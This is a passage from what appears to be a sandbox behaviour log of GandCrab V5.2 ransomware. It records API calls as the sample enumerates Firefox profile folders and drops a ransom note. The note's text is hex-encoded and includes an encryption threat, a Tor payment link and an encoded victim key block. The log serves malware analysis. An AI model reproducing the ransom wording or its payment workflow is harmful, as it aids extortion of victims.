[0079.959] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.959] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.959] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.959] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.959] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.959] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0079.959] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0079.959] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0079.960] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0079.960] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.960] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.961] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.961] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\TITWMVJL-DECRYPT.txt") returned 84 [0079.961] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0079.961] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\